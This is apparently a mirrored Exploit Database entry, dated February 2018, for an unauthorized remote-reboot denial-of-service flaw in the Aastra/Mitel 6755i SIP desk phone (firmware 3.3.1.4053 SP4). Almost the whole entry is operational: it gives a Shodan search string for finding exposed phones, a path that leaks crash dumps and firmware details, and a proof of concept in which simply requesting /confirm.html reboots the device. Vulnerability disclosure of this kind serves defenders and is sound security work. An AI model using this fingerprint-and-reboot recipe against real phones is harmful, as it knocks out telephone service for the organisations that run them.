Aastra 6755i SIP SP4 – Denial of Service

• Exploit Database
• 15 阅读

• 作者： Wadeek
  日期： 2018-02-19
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44142/

• # Exploit Title:Aastra 6755i SIP SP4 | Unauthorized Remote Reboot
  # Date: 17/02/2018
  # Exploit Author: Wadeek
  # Hardware Version: 6755i
  # Firmware Version: 3.3.1.4053 SP4
  # Vendor Homepage: http://www.aastra.sg/
  # Firmware Link: http://www.aastra.sg/cps/rde/aareddownload?file_id=6950-17778-_P32_XML&dsproject=www-aastra-sg&mtype=zip
  
  == Web Fingerprinting ==
  #===========================================
  :www.shodan.io: "Server: Aragorn" "WWW-Authenticate: Basic realm" "Mitel 6755i"
  #===========================================
  :Device image: /aastra.png (160x50)
  #===========================================
  :Crash dump, Firmware version, Firmware model,...: /crashlog.html
  #===========================================
  
  == PoC ==
  #================================================
  :Unauthorized Remote Reboot ("crash.cfg" file is created after): /confirm.html
  #================================================